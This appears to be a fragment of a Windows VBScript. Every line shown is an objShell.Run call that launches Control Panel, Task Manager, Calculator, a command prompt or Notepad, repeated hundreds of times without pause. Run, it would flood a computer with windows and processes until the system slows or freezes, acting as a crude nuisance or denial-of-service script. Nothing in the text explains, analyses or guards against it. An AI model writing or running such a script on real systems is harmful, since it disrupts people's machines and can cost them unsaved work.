objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

